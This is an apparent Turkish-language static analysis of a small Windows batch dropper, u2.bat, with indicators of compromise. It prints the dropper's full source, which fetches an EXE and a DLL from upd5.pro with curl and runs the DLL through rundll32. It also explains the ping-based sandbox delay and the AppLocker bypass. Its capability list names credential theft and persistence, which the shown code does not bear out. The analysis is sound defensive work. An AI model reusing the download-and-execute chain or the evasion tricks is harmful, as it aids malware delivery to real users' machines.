Statik Analiz — BAT Dropper (u2.bat) | Tehdit: YUKSEK
Dosya Kimliği
| SHA256 | 3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d |
|---|---|
| Dosya Adı | u2.bat ("update 2" — numaralı kampanya bileşeni) |
| Boyut | 326 byte (minimal dropper — sadece eylem komutları) |
| Tür | Windows Batch Script (.bat) |
Tam Kaynak Kodu (326 byte)
MINİMAL DROPPER: 326 byte'ta tam enfeksiyon zinciri!
@echo off echo "-> Loading update 2 tool..." curl -o qd_x86.exe https://upd5.pro/update/qd_x86.exe curl -o 02.dll https://upd5.pro/update/02.dll ping -n 5 localhost > nul echo "-> Loading update 2..." rundll32.exe 02.dll,checkit echo "-> Done."
upd5.pro: C2 Dağıtım Sunucusu
C2 DOMAIN: upd5.pro — "update 5 pro" kampanya altyapısı!
upd5.pro -- "upd5" = "update" + "5": numaralı güncelleme sunucusu - u2.bat = "update 2" dropper - upd5.pro = "update 5 pro" dağıtım sunucusu - Kampanya altyapısı: farklı numaralı araçlar için farklı numara şeması -- ".pro" TLD: düşük maliyetli ve az izlenen TLD -- Payload URL'leri: https://upd5.pro/update/qd_x86.exe → ana payload (x86 yürütülebilir) https://upd5.pro/update/02.dll → DLL bileşen (02 = numara 2?) -- "update" klasörü: meşru güncelleme sunucusu taklidi
curl -o qd_x86.exe / 02.dll: Payload İndirme
curl -o qd_x86.exe https://upd5.pro/update/qd_x86.exe
curl -o 02.dll https://upd5.pro/update/02.dll
-- curl: Windows 10+ dahili araç (Living off the Land — PowerShell gerekmez)
-- qd_x86.exe: 32-bit yürütülebilir ("qd" = belirsiz kısaltma — dropper veya loader)
-- 02.dll: numaralı DLL bileşen (02 = 2. bileşen)
-- İki aşamalı indirme: hem EXE hem DLL ayrı indirilir → modüler yapı
-- EXE çalıştırılmıyor doğrudan: sadece DLL rundll32 ile yükleniyor
-- EXE olası rolü: DLL'i side-load etmek veya ikincil bileşen
ping -n 5 localhost: Anti-Sandbox Geciktirme Hilesi
ping -n 5 localhost > nul -- "ping localhost" = loopback ping → ağ bağlantısı gerekmez, garanti çalışır -- "-n 5" = 5 ping paketi → ~5 saniye gecikme (her ping ~1 saniye) -- "> nul" = tüm çıktıyı bastır (sessiz) -- Sandbox bypass tekniği: - Bazı sandbox'lar "sleep" benzeri beklemeleri atlar - ping komutu: OS'un ağ yığınından → atlayamıyorlar - İndirilen dosyaların diske yazılmasını bekle (disk I/O gecikme) - curl indirmeleri tamamlanmadan rundll32 çalıştırmayı önle -- Alternatif: "ping 192.0.2.2 -w 5000" (RFC5737 TEST-NET) — daha etkili
rundll32.exe 02.dll,checkit: DLL Export Çalıştırma
rundll32.exe 02.dll,checkit -- rundll32: Windows dahili araç (AV beyaz listesinde) -- "02.dll": indirilen DLL → yerel dizine yazıldı -- "checkit": DLL içindeki export fonksiyon adı - Exports: `checkit` → malware asıl entry point'i - "checkit" adı: meşru araç taklidi yapıyor gibi görünüyor -- rundll32 ile DLL çalıştırma: AppLocker/SRP bypass tekniği - Kısıtlı ortamlar: rundll32'e izin verilen → DLL payload atlar -- 02.dll içeriği bilinmiyor (C2'den dinamik indiriliyor)
IOC
| SHA256 | 3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d |
|---|---|
| C2 | upd5.pro |
| URL 1 | https://upd5.pro/update/qd_x86.exe |
| URL 2 | https://upd5.pro/update/02.dll |
| DLL Export | 02.dll,checkit |
BATDropper — Malware Profili
BAT dropper u2.bat. upd5.pro C2 distribution server. curl download qd_x86.exe + 02.dll. rundll32.exe 02.dll,checkit DLL export execution. ping -n 5 localhost sandbox delay.
Malware Tipi
Loader
Programlama Dili
Batch Script
C2 Protokolü
HTTPS
Hedef Sistemler
Küresel
Yetenekler ve Davranış
Payload İndirme
Süreç Enjeksiyonu
Modüler Mimari
Kimlik Bilgisi Hırsızlığı
Yanal Hareket
Kalıcılık
Anti-VM/Sandbox
İkincil Payload Dağıtımı
IOC Listesi (2 gösterge)
IOC — BATDropper
# SHA256
3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d
# SHA256
3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d
| Tür | Değer | Not |
|---|---|---|
| sha256 | 3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d | |
| sha256 | 3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d |